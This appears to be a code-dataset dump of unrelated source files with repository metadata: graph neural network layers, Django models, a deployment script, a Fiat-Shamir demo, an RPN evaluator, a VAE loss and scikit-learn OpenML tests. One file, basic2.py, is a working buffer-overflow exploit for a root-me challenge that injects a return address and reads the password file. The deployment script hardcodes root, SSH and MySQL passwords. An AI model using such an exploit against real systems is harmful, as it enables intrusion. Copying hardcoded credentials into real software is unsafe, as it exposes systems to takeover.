if self.dropout > 0:
score = F.dropout(score, p=self.dropout, training=self.training)
return torch.matmul(score, value)
def __repr__(self): # pragma: no cover
return '{}(dropout={})'.format(self.__class__.__name__, self.dropout)
class MultiHead(Attention):
def __init__(self,
in_channels,
out_channels,
heads=1,
groups=1,
dropout=0,
bias=True):
super(MultiHead, self).__init__(dropout)
self.in_channels = in_channels
self.out_channels = out_channels
self.heads = heads
self.groups = groups
self.bias = bias
assert in_channels % heads == 0 and out_channels % heads == 0
assert in_channels % groups == 0 and out_channels % groups == 0
assert max(groups, self.heads) % min(groups, self.heads) == 0
self.lin_q = Linear(in_channels, out_channels, groups, bias)
self.lin_k = Linear(in_channels, out_channels, groups, bias)
self.lin_v = Linear(in_channels, out_channels, groups, bias)
self.reset_parameters()
def reset_parameters(self):
self.lin_q.reset_parameters()
self.lin_k.reset_parameters()
self.lin_v.reset_parameters()
def forward(self, query, key, value):
# Query: [*, query_entries, in_channels]
# Key: [*, key_entries, in_channels]
# Value: [*, key_entries, in_channels]
# Output: [*, query_entries, out_channels]
assert query.dim() == key.dim() == value.dim() >= 2
assert query.size(-1) == key.size(-1) == value.size(-1)
assert key.size(-2) == value.size(-2)
query = self.lin_q(query)
key = self.lin_k(key)
value = self.lin_v(value)
# Query: [*, heads, query_entries, out_channels // heads]
# Key: [*, heads, key_entries, out_channels // heads]
# Value: [*, heads, key_entries, out_channels // heads]
size = list(query.size())[:-2]
out_channels_per_head = self.out_channels // self.heads
query = query.view(*size, query.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
key = key.view(*size, key.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
value = value.view(*size, value.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
# Output: [*, heads, query_entries, out_channels // heads]
out = super(MultiHead, self).forward(query, key, value)
# Output: [*, query_entries, heads, out_channels // heads]
out = out.transpose(-3, -2).contiguous()
# Output: [*, query_entries, out_channels]
out = out.view(*size, query.size(-2), self.out_channels)
return out
def __repr__(self): # pragma: no cover
return '{}({}, {}, heads={}, groups={}, dropout={}, bias={})'.format(
self.__class__.__name__, self.in_channels, self.out_channels,
self.heads, self.groups, self.dropout, self.bias)
class DNAConv(MessagePassing):
r"""The dynamic neighborhood aggregation operator from the `"Just Jump:
Towards Dynamic Neighborhood Aggregation in Graph Neural Networks"
<https://arxiv.org/abs/1904.04849>`_ paper
.. math::
\mathbf{x}_v^{(t)} = h_{\mathbf{\Theta}}^{(t)} \left( \mathbf{x}_{v
\leftarrow v}^{(t)}, \left\{ \mathbf{x}_{v \leftarrow w}^{(t)} : w \in
\mathcal{N}(v) \right\} \right)
based on (multi-head) dot-product attention
.. math::
\mathbf{x}_{v \leftarrow w}^{(t)} = \textrm{Attention} \left(
\mathbf{x}^{(t-1)}_v \, \mathbf{\Theta}_Q^{(t)}, [\mathbf{x}_w^{(1)},
\ldots, \mathbf{x}_w^{(t-1)}] \, \mathbf{Q}_K^{(t)}, \,
[\mathbf{x}_w^{(1)}, \ldots, \mathbf{x}_w^{(t-1)}] \,
\mathbf{Q}_V^{(t)} \right)
with :math:`\mathbf{\Theta}_Q^{(t)}, \mathbf{\Theta}_K^{(t)},
\mathbf{\Theta}_V^{(t)}` denoting (grouped) projection matrices for query,
key and value information, respectively.
:math:`h^{(t)}_{\mathbf{\Theta}}` is implemented as a non-trainable
version of :class:`torch_geometric.nn.conv.GCNConv`.
.. note::
In contrast to other layers, this operator expects node features as
shape :obj:`[num_nodes, num_layers, channels]`.
Args:
channels (int): Size of each input/output sample.
heads (int, optional): Number of multi-head-attentions.
(default: :obj:`1`)
groups (int, optional): Number of groups to use for all linear
projections. (default: :obj:`1`)
dropout (float, optional): Dropout probability of attention
coefficients. (default: :obj:`0`)
cached (bool, optional): If set to :obj:`True`, the layer will cache
the computation of :math:`{\left(\mathbf{\hat{D}}^{-1/2}
\mathbf{\hat{A}} \mathbf{\hat{D}}^{-1/2} \right)}`.
(default: :obj:`False`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
"""
def __init__(self,
channels,
heads=1,
groups=1,
dropout=0,
cached=False,
bias=True):
super(DNAConv, self).__init__('add')
self.bias = bias
self.cached = cached
self.cached_result = None
self.multi_head = MultiHead(channels, channels, heads, groups, dropout,
bias)
self.reset_parameters()
def reset_parameters(self):
self.multi_head.reset_parameters()
self.cached_result = None
def forward(self, x, edge_index, edge_weight=None):
""""""
# X: [num_nodes, num_layers, channels]
# Edge Index: [2, num_edges]
# Edge Weight: [num_edges]
if x.dim() != 3:
raise ValueError('Feature shape must be [num_nodes, num_layers, '
'channels].')
num_nodes, num_layers, channels = x.size()
if not self.cached or self.cached_result is None:
edge_index, norm = GCNConv.norm(
edge_index, x.size(0), edge_weight, dtype=x.dtype)
self.cached_result = edge_index, norm
edge_index, norm = self.cached_result
return self.propagate(edge_index, x=x, norm=norm)
def message(self, x_i, x_j, norm):
# X_i: [num_edges, num_layers, channels]
# X_j: [num_edges, num_layers, channels]
# Norm: [num_edges]
# Output: [num_edges, channels]
x_i = x_i[:, -1:] # [num_edges, 1, channels]
out = self.multi_head(x_i, x_j, x_j) # [num_edges, 1, channels]
return norm.view(-1, 1) * out.squeeze(1)
def __repr__(self):
return '{}({}, heads={}, groups={})'.format(
self.__class__.__name__, self.multi_head.in_channels,
self.multi_head.heads, self.multi_head.groups)
| [
"[email protected]"
] | |
fa5290467644a2b4bf1c09544db265e9187a3b94 | 6293491133e816f6148d576639f21348f8f19297 | /main/models/legacy.py | dd4cf540dfae6daf01225a5085e3e09b1ce6366c | [
"MIT"
] | permissive | BAMRU-Tech/bamru_net | 0f6539973fb4eb088d76f50f491c2c1b74edd35b | b988b6e41c786448c4a8a76c11397d195f802a26 | refs/heads/main | 2023-07-24T14:09:59.712325 | 2023-07-11T06:37:07 | 2023-07-11T06:37:07 | 149,375,227 | 7 | 3 | MIT | 2023-07-11T06:39:00 | 2018-09-19T01:38:59 | Python | UTF-8 | Python | false | false | 5,554 | py |
#####################################################################
# Models below this line have not been looked at
#####################################################################
class DataFiles(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
download_count = models.IntegerField(blank=True, null=True)
data_file_extension = models.TextField(blank=True, null=True) # This field type is a guess.
data_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
data_file_size = models.TextField(blank=True, null=True) # This field type is a guess.
data_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
data_updated_at = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
killme1 = models.IntegerField(blank=True, null=True)
killme2 = models.IntegerField(blank=True, null=True)
caption = models.TextField(blank=True, null=True) # This field type is a guess.
published = models.NullBooleanField()
class DataLinks(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
site_url = models.TextField(blank=True, null=True) # This field type is a guess.
caption = models.TextField(blank=True, null=True) # This field type is a guess.
published = models.NullBooleanField()
link_backup_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
link_backup_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
link_backup_file_size = models.IntegerField(blank=True, null=True)
link_backup_updated_at = models.IntegerField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class DataPhotos(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
caption = models.TextField(blank=True, null=True) # This field type is a guess.
image_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
image_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
image_file_size = models.IntegerField(blank=True, null=True)
image_updated_at = models.IntegerField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
published = models.NullBooleanField()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventFiles(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_file_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventLinks(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_link_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventPhotos(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_photo_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventReports(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
typ = models.TextField(blank=True, null=True) # This field type is a guess.
member_id = models.IntegerField(blank=True, null=True)
event_id = models.IntegerField(blank=True, null=True)
period_id = models.IntegerField(blank=True, null=True)
title = models.TextField(blank=True, null=True) # This field type is a guess.
data = models.TextField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
published = models.NullBooleanField()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
################ Old messaging ###########################
class Rsvps(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
message_id = models.IntegerField(blank=True, null=True)
prompt = models.TextField(blank=True, null=True) # This field type is a guess.
yes_prompt = models.TextField(blank=True, null=True) # This field type is a guess.
no_prompt = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
class Journals(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
distribution_id = models.IntegerField(blank=True, null=True)
action = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
| [
"[email protected]"
] | |
5e9e628a0571d892088ff32b1a6315611dcec60e | 5ab78eb2f4f17337f9e8b6a90e588aaba6af4a90 | /work/auto_make_iso.py | 685dc4c8924bfea5ff8431c946d8ec46dd276f11 | [] | no_license | swl5571147a/stone | 3946dbdba2315bb9f75495a1efcbe713e4c72324 | d75538601e992fec000adf0550f9ac54fa326e18 | refs/heads/master | 2021-01-21T00:20:55.272706 | 2014-05-26T15:41:16 | 2014-05-26T15:41:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,701 | py | #!/usr/bin/env python
import paramiko,os,sys,commands,time
from subprocess import Popen, PIPE
import shlex
#set the default configure and argvs
current_time = time.strftime('%Y-%m-%d-%H-%M-%S',time.localtime(time.time()))
conf = {'path_mcu':'/home/broad/sunwenlong/iserver-mcu/medooze',
'path_mcuWeb':'',
'path_siremis':'/home/broad/sunwenlong/iserver-sipserver',
'path_source':'/home/broad/sunwenlong/source',
'port':22,
'remote_ip':'192.168.1.100',
'root':'broadeng',
'broad':'broad123',
'path_sql':'/home/broad/sunwenlong/iserver-sipserver/config'
}
def ssh_get_source(remote_ip,port,user,passwd):
'''set the ssh-connect for gettiing the source'''
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(remote_ip,port,user,passwd)
return ssh
def ssh_down_load(remote_ip,port,user,passwd):
'''set the ssh-connect for down load the tar_source'''
ssh = paramiko.Transport((remote_ip,port))
ssh.connect(username=user,password=passwd)
return ssh
def git_update_tar(ssh,path,file_name):
'''To update the git from gitserver and tar the target dir to filename-current_time.tar.gz'''
cmd = 'cd %s && git pull && tar zcvf %s-%s.tar.gz %s'%(path,file_name,current_time, file_name)
try:
stdin,stdout,stderr = ssh.exec_command(cmd)
print '%s backup OK'%file_name
except:
print 'Error! %s backup error'%file_name
if not len(stderr.read()) == 0:
print stderr.read()
ssh.close()
def scp_source(ssh,path,file_name):
'''From the source to down load the tar file'''
sftp = paramiko.SFTPClient.from_transport(ssh)
remote_path = '%s/%s-%s.tar.gz'%(path,file_name,current_time)
local_path = '%s/%s-%s.tar.gz'%(conf['path_source'],file_name,current_time)
try:
s = sftp.get(remote_path,local_path)
print 'OK! %s download sucessfully!'%file_name
except:
print 'Error! %s could not download!'%file_name
ssh.close()
def clean_source(ssh,path,file_name):
'''To clean the tar file in the source dir'''
cmd = 'rm -f %s/%s-%s.tar.gz'%(path,file_name,current_time)
stdin,stdout,stderr = ssh.exec_command(cmd)
if not stderr.readlines():
print '%s-%s.tar.gz clean up from remote'%(file_name,current_time)
else:
print 'Error! %s-%s.tar.gz clean up error'%(file_name,current_time)
def tar_zxvf(file_name):
'''To tar zxvf the tar_file_name '''
dir_path = os.path.join(conf['path_source'], file_name)
err_rm = clean_old_dir(dir_path)
print_err(err_rm)
tar_path = os.path.join(conf['path_source'], '%s-%s.tar.gz')%(file_name,current_time)
tar_file = '%s-%s.tar.gz'%(file_name,current_time)
tar_cmd = 'cd %s && tar zxvf %s'%(conf['path_source'], tar_file)
if os.path.exists(tar_path):
try:
subf_tar = Popen(tar_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_tar = subf_tar.stderr.read()
if not err_tar:
print 'tar zxvf %s is OK!'%tar_file
except:
err_tar = 'Error! The command of tar zxvf %s clould not be done!Please check it!'%(tar_file)
else:
print 'Error! The file of %s is not exists!Please check it in dir:%s'%(file_name, conf['path_source'])
print_err(err_tar)
def mcu_make():
'''To make the new mcu and replace the old mcu'''
make_path = os.path.join(conf['path_source'], 'mcu')
print 'It will take some minutes,Please wait ......'
if not os.path.exists(make_path):
print 'Error! The dir mcu clould not be found! Please chech it in dir:/home/broad/sunwenlong/source '
else:
make_cmd = 'cd %s && sudo make'%make_path
try:
subf = Popen(make_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_make = subf.stderr.read()
if not err_make:
print 'make mcu OK!'
except:
err_make = 'Error! The mcu_make_cmd cloud not be done!'
print_err(err_make)
make_mcu_path = os.path.join(make_path, 'bin/release')
new_mcu = os.path.join(make_mcu_path, 'mcu')
old_mcu_path = '/usr/local/bin'
old_mcu = '/usr/local/bin/mcu'
if os.path.exists(new_mcu):
rm_cmd = 'rm -f %s'%old_mcu
cp_cmd = 'cp %s %s'%(new_mcu, old_mcu_path)
try:
subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE, shell=True)
subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_rm = subf_rm.stderr.read()
err_cp = subf_cp.stderr.read()
if not err_rm:
print 'OK! The command of remove the old mcu is OK!'
if not err_cp:
print 'OK! Copy the new mcu to /usr/local/bin is OK!'
except:
err_rm = 'Error! The command of remove the old mcu could not be done!Please check it!'
err_cp = 'Error! The command of copy the new mcu to /usr/local/bin could not be done!Please check it!'
else:
print 'Warning! The target file mcu is not exists,Please it!'
print_err(err_rm)
print_err(err_cp)
def restart_service(target_service):
'''To restart the service of target_service'''
re_cmd = ['service', target_service, 'restart']
try:
subf_re = Popen(re_cmd, stdout=PIPE, stderr=PIPE)
err_re = subf_re.stderr.read()
if not err_re:
print 'OK! The command of restart the service %s is OK!'%target_service
except:
err_re = 'Error! The command of restart the service %s colud not be done!'%target_service
print_err(err_re)
def print_err(s):
'''To print the error if there is error'''
if s:
for i in s.split('\n'):
print i
def clean_old_dir(dir_path):
'''To clean the old dir for the new dir using'''
if os.path.exists(dir_path):
cmd = ['rm', '-rf', dir_path]
try:
subf = Popen(cmd, stdout=PIPE, stderr=PIPE)
err = subf.stderr.read()
except:
err = 'Error! The command of cleaning the old dir which is %s is not be done!Please it!'%dir_path
return err
def replace_siremis(dir_name):
'''To remove the old siremis dir, and copy the new dir of siremis to /var/www'''
#remove the old siremis dir
dir_path = os.path.join('/var/www', dir_name)
if os.path.exists(dir_path):
rm_cmd = ['rm', '-rf', dir_path]
try:
subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE)
err_rm = subf_rm.stderr.read()
if not err_rm:
print 'OK! The command of remove the dir : %s is OK!'%dir_name
except:
err_rm = 'Error! The command of remove the dir : %s colud not be done!Please chech it!'%dir_name
print_err(err_rm)
#to cp the new siremis to /var/www
src_path = os.path.join(conf['path_source'], dir_name)
cp_cmd = ['cp', '-r', src_path, '/var/www']
try:
subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE)
err_cp = subf_cp.stderr.read()
if not err_cp:
print 'OK! The command of copy the dir : %s to /var/www is OK!'%dir_name
except:
err_cp = 'Error! The command of copy the dir : %s to /var/www colud not be done!Please check it!'%dir_name
print_err(err_cp)
#to chown the owner of the dir siremis
if os.path.exists(dir_path):
ch_cmd = ['chown','-R', 'www-data:www-data', dir_path]
try:
subf_ch = Popen(ch_cmd, stdout=PIPE, stderr=PIPE)
err_ch = subf_ch.stderr.read()
if not err_ch:
print 'OK! The command of chown the %s to www-data is OK!'%dir_name
except:
err_ch = 'Error! The command of chown the %s to www-data colud not be done!Please check it!'%dir_name
print_err(err_ch)
def purge_kernel(kernel):
'''purge kernel 3.9.5 and 3.11.6'''
cmd = ['apt-get','purge',kernel]
try:
subf = Popen(cmd,stderr=PIPE)
err = subf.stderr.read()
except:
err = 'Error! The command of purge %s could not be done!'%kernel
if err:
print err
def remove_rubbish(path):
'''remove rubbish'''
cmd = 'rm -Rf %s' %path
try:
subf = Popen(cmd,stderr=PIPE,shell=True)
err = subf.stderr.read()
except:
err = 'Error! The command of remove %s could not be done!'%path
if err:
print err
def get_file_md5(file_path):
'''Get the file md5'''
if os.path.exists(file_path):
cmd = ['md5sum',file_path]
try:
subf = Popen(cmd,stderr=PIPE,stdout=PIPE)
data = subf.stdout.read()
err = subf.stderr.read()
except:
data = ''
err = 'Error! The command of md5sum %s could not be done!'%file_path
if err:
print err
if data:
md5_value = data.split()[0].strip()
else:
print 'Warning! Could not get the %s md5 value!'%file_path
else:
md5_value = ''
print 'Warning! The %s is not exists!'%file_path
return md5_value
def update_sql(db_name,sql_bak_name):
'''update the mysql table'''
md5_file = '%s/md5.txt'%conf['path_source']
if os.path.exists(md5_file):
with open(md5_file,'r') as fp:
old_md5 = fp.read().strip()
else:
old_md5 = ''
ssh = ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root'])
sftp = paramiko.SFTPClient.from_transport(ssh)
remote_path = '%s/%s'%(conf['path_sql'],sql_bak_name)
local_path = '%s/%s'%(conf['path_source'],sql_bak_name)
try:
sftp.get(remote_path,local_path)
print 'OK! %s download sucessfully!'%sql_bak_name
except:
print 'Error! %s could not download!'%sql_bak_name
ssh.close()
if os.path.exists(local_path):
new_md5 = get_file_md5(local_path)
else:
new_md5 = ''
print 'Error! The file of md5 %s is not exists!'%local_path
if not old_md5 == new_md5:
cmd = 'mysql -uroot -pbroadeng %s < %s/%s' %(db_name,conf['path_source'],sql_bak_name)
try:
subf = Popen(cmd,stderr=PIPE,shell=True)
err = subf.stderr.read()
except:
err = 'Error! The command of update of the mysql table %s could not be done!'%db_name
if err:
print err
restart_service('mysql')
restart_service('mcuWeb')
with open(md5_file,'w') as fp_w:
fp_w.write(new_md5)
def close_sudo():
'''close sudo users'''
cmd = ['cp','-f','/etc/sudoers.bak','/etc/sudoers']
try:
subf = Popen(cmd,stderr=PIPE)
err = subf.stderr.read()
except:
err = 'Error! The command of modify the sudoers could not be done!'
if err:
print err
def main():
#update the mcu from git and tar it to tar_file
git_update_tar(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu')
time.sleep(1)
#down load the mcu tar_file
scp_source(ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root']),conf['path_mcu'],'mcu')
time.sleep(1)
#clean the source
clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu')
time.sleep(1)
#tar zxvf mcu
tar_zxvf('mcu')
time.sleep(1)
#make mcu and replace the old mcu
mcu_make()
time.sleep(1)
#restart the mcu
restart_service('mediamixer')
#update the siremis from git and tar it to tar_file
git_update_tar(ssh_get_source(conf['remote_ip'], conf['port'], 'broad', conf['broad']), conf['path_siremis'], 'siremis-4.0.0')
time.sleep(1)
#down load the siremis tar_file
scp_source(ssh_down_load(conf['remote_ip'], conf['port'], 'root', conf['root']), conf['path_siremis'], 'siremis-4.0.0')
time.sleep(1)
#clean the source
clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_siremis'],'siremis-4.0.0')
time.sleep(1)
#tar zxvf mcu
tar_zxvf('siremis-4.0.0')
time.sleep(1)
#remove the old siremis and copy the new siremis to /var/www
replace_siremis('siremis-4.0.0')
time.sleep(1)
#restart the apache2 to make sure it work
restart_service('apache2')
#update mysql table
update_sql('kamailio','kamailio.sql')
#purge the kernel
purge_kernel('linux-image-3.11.6-031106-generic')
purge_kernel('linux-image-3.9.5-030905-generic')
#close sudoers
close_sudo()
#remove the rubbish
remove_rubbish('/opt/*')
remove_rubbish('/usr/local/src/*')
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
79791e657d895150d196b1b657a4d3fecc3f369a | d50aee7c9ede6e17be1825b4ef124fdfd63b67bf | /wargames/root-me/basic2.py | fdbea4bda5383dd9a8a464468050939c8bf50d60 | [] | no_license | geethna/Binary-Exploitation | c4512f8389fc2ef94954ba13ca60b63afd430967 | ef22d7592cd536b08dcad503f744b31f73bb761b | refs/heads/master | 2022-11-23T04:33:59.076903 | 2020-07-29T06:35:27 | 2020-07-29T06:35:27 | 283,412,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | from pwn import *
p = ssh(host='challenge02.root-me.org' ,user='app-systeme-ch15' ,password='app-systeme-ch15',port=2222)
s=p.process(executable='./ch15')
s.sendline('i' * 128 + '\x64\x84\x04\x08')
s.sendline('cat .passwd')
print s.recvline()
| [
"[email protected]"
] | |
0d9dd9c943b6681df14ffab31032cc8d1c929a07 | a0e6a780eb8789b4674a686997a3d9de9ad9c95c | /contracts/business_template/privacy_computation/Fiat-Shamir-ZK/contract_step45.py | e1bd0b4f7e3fdaf1db8c14492ba9eb4962748dc8 | [
"Apache-2.0",
"Apache-1.1"
] | permissive | freezehe/SmartDev-Contract | 4e8d5d3670e59889500269a6207d1c855972cac7 | ec31fb787bdab96703669b551f938e3c327fc00e | refs/heads/master | 2023-06-29T09:12:14.049701 | 2021-08-04T13:39:18 | 2021-08-04T13:39:18 | 385,824,978 | 2 | 0 | Apache-2.0 | 2021-07-14T05:34:01 | 2021-07-14T05:34:01 | null | UTF-8 | Python | false | false | 337 | py | import libnum
import hashlib
import random
n=8269
g=11
password = "Hello"
x = int(hashlib.sha256(password.encode()).hexdigest()[:8], 16) % n
print('\n======Phase 4: Peggy recieves c and calculate r=v-cx, sends r to Victor==================')
c = input("c= ")
v = input("v= ")
r = (int(v) - int(c) * x) % (n-1)
print('r=v-cx =\t\t',r) | [
"[email protected]"
] | |
7469228ba95707cd19ef91526eeb6fb67073a8e4 | 276ceede3fe56f00af940732df478f045337b67c | /Loss_functions.py | 4b8856c98b96e6d87b6c349432b09085e0ecbeb2 | [] | no_license | Ali-Sahili/Generative_Architectures | 32c4a122af567f4b48418e69b13210a76254932f | bd7ae32e149592221b622f2d3ab9a43c1daa89ca | refs/heads/master | 2022-08-10T12:55:58.726022 | 2022-07-09T15:06:05 | 2022-07-09T15:06:05 | 255,911,670 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | import torch
from torch import nn
# This function is used in the variational auto-encoder
reconstruction_function = nn.MSELoss(size_average=False)
def loss_function(recon_x, x, mu, logvar):
"""
recon_x: generating images
x: origin images
mu: latent mean
logvar: latent log variance
"""
BCE = reconstruction_function(recon_x, x) # mse loss
# loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
KLD = torch.sum(KLD_element).mul_(-0.5)
# KL divergence
return BCE + KLD
| [
"[email protected]"
] | |
9c53e1a542d95c9a0bc8497a2a168df57c45e704 | 2a3a7f4940157f3d07700451b2633f60ba58abdc | /stack/150-Evaluate-Reverse-Polish-Notation/num_push_operator_pop2push1.py | 7e80fad345956003b2ab85e49202df48460ea324 | [] | no_license | moonlightshadow123/leetcode_solutions | cd8400eff270f0608995089ab0207240071a7c46 | 6e4fa7fba17292fe4e2511555d743f41259d5351 | refs/heads/master | 2021-05-24T03:43:49.949864 | 2020-04-11T03:55:27 | 2020-04-11T03:55:27 | 73,599,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | import math
class Solution(object):
def evalRPN(self, tokens):
"""
:type tokens: List[str]
:rtype: int
"""
operators = set(['+', '-', '*', '/'])
stack = []
for token in tokens:
if token in operators:
y = stack[-1]
del stack[-1]
x = stack[-1]
del stack[-1]
stack.append(self.operate(x, y, token))
else:
stack.append(int(token))
return stack[-1]
def operate(self, x, y, token):
if token == '+':
return x + y
elif token == '-':
return x - y
elif token == '*':
return x * y
elif token == '/':
if x*y < 0:
return int(math.ceil(float(x) / y))
else:
return x / y
| [
"[email protected]"
] | |
1086b526a49d9b0593b4fd44ca8ffb61a9479f33 | 6e820756b82ffbe9837348937e53f1a0ce0e6cca | /Lib/site-packages/sklearn/datasets/tests/test_openml.py | fa6b53d5132cbf961f655908b2a6fbb64b0f596f | [] | no_license | AndreasPatsimas/pms_papei | c2afd941de6ae234dd37784d746e794183ebb8d3 | da10220ea468304c1066bed55b8f92ba9e5ada8a | refs/heads/master | 2023-02-01T23:33:39.221747 | 2020-12-19T12:17:59 | 2020-12-19T12:17:59 | 321,115,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,761 | py | """Test the openml loader.
"""
import gzip
import json
import numpy as np
import os
import re
import scipy.sparse
import sklearn
import pytest
from sklearn import config_context
from sklearn.datasets import fetch_openml
from sklearn.datasets._openml import (_open_openml_url,
_arff,
_DATA_FILE,
_get_data_description_by_id,
_get_local_path,
_retry_with_clean_cache,
_feature_to_dtype)
from sklearn.utils._testing import (assert_warns_message,
assert_raise_message)
from sklearn.utils import is_scalar_nan
from sklearn.utils._testing import assert_allclose, assert_array_equal
from urllib.error import HTTPError
from sklearn.datasets.tests.test_common import check_return_X_y
from functools import partial
currdir = os.path.dirname(os.path.abspath(__file__))
# if True, urlopen will be monkey patched to only use local files
test_offline = True
def _test_features_list(data_id):
# XXX Test is intended to verify/ensure correct decoding behavior
# Not usable with sparse data or datasets that have columns marked as
# {row_identifier, ignore}
def decode_column(data_bunch, col_idx):
col_name = data_bunch.feature_names[col_idx]
if col_name in data_bunch.categories:
# XXX: This would be faster with np.take, although it does not
# handle missing values fast (also not with mode='wrap')
cat = data_bunch.categories[col_name]
result = [None if is_scalar_nan(idx) else cat[int(idx)]
for idx in data_bunch.data[:, col_idx]]
return np.array(result, dtype='O')
else:
# non-nominal attribute
return data_bunch.data[:, col_idx]
data_bunch = fetch_openml(data_id=data_id, cache=False, target_column=None)
# also obtain decoded arff
data_description = _get_data_description_by_id(data_id, None)
sparse = data_description['format'].lower() == 'sparse_arff'
if sparse is True:
raise ValueError('This test is not intended for sparse data, to keep '
'code relatively simple')
url = _DATA_FILE.format(data_description['file_id'])
with _open_openml_url(url, data_home=None) as f:
data_arff = _arff.load((line.decode('utf-8') for line in f),
return_type=(_arff.COO if sparse
else _arff.DENSE_GEN),
encode_nominal=False)
data_downloaded = np.array(list(data_arff['data']), dtype='O')
for i in range(len(data_bunch.feature_names)):
# XXX: Test per column, as this makes it easier to avoid problems with
# missing values
np.testing.assert_array_equal(data_downloaded[:, i],
decode_column(data_bunch, i))
def _fetch_dataset_from_openml(data_id, data_name, data_version,
target_column,
expected_observations, expected_features,
expected_missing,
expected_data_dtype, expected_target_dtype,
expect_sparse, compare_default_target):
# fetches a dataset in three various ways from OpenML, using the
# fetch_openml function, and does various checks on the validity of the
# result. Note that this function can be mocked (by invoking
# _monkey_patch_webbased_functions before invoking this function)
data_by_name_id = fetch_openml(name=data_name, version=data_version,
cache=False)
assert int(data_by_name_id.details['id']) == data_id
# Please note that cache=False is crucial, as the monkey patched files are
# not consistent with reality
fetch_openml(name=data_name, cache=False)
# without specifying the version, there is no guarantee that the data id
# will be the same
# fetch with dataset id
data_by_id = fetch_openml(data_id=data_id, cache=False,
target_column=target_column)
assert data_by_id.details['name'] == data_name
assert data_by_id.data.shape == (expected_observations, expected_features)
if isinstance(target_column, str):
# single target, so target is vector
assert data_by_id.target.shape == (expected_observations, )
assert data_by_id.target_names == [target_column]
elif isinstance(target_column, list):
# multi target, so target is array
assert data_by_id.target.shape == (expected_observations,
len(target_column))
assert data_by_id.target_names == target_column
assert data_by_id.data.dtype == expected_data_dtype
assert data_by_id.target.dtype == expected_target_dtype
assert len(data_by_id.feature_names) == expected_features
for feature in data_by_id.feature_names:
assert isinstance(feature, str)
# TODO: pass in a list of expected nominal features
for feature, categories in data_by_id.categories.items():
feature_idx = data_by_id.feature_names.index(feature)
values = np.unique(data_by_id.data[:, feature_idx])
values = values[np.isfinite(values)]
assert set(values) <= set(range(len(categories)))
if compare_default_target:
# check whether the data by id and data by id target are equal
data_by_id_default = fetch_openml(data_id=data_id, cache=False)
np.testing.assert_allclose(data_by_id.data, data_by_id_default.data)
if data_by_id.target.dtype == np.float64:
np.testing.assert_allclose(data_by_id.target,
data_by_id_default.target)
else:
assert np.array_equal(data_by_id.target, data_by_id_default.target)
if expect_sparse:
assert isinstance(data_by_id.data, scipy.sparse.csr_matrix)
else:
assert isinstance(data_by_id.data, np.ndarray)
# np.isnan doesn't work on CSR matrix
assert (np.count_nonzero(np.isnan(data_by_id.data)) ==
expected_missing)
# test return_X_y option
fetch_func = partial(fetch_openml, data_id=data_id, cache=False,
